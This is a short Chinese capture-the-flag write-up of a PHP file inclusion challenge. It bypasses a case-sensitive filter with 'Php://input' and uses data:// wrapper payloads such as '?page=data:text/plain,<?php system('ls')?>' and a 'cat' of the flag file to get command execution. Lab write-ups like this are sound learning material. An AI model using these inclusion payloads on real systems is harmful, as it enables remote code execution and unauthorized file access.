先代码审计一下发现,这是一个文件包含,需要绕过while循环语句,可以用伪协议,伪协议知识参考 php伪协议 - single-dog - 博客园
第一种,Php://input (大写p为了绕过while循环);
burp发送给repeater构建参数,如下:
发现存在一个fl4gisisish3r3.php;继续使用cat fl4gisisish3r3.php打开,发现flag;
第二,data伪协议;
data: text/plain,<?php 执行内容 ?>
构造:?page=data:text/plain,<?php system('ls')?>
发现文件,继续构造打开:?page=data:text/plain,<?php system('cat fl4gisisish3r3.php')?>
这里需要注意,这里的flag在源代码里面,需要查看源代码;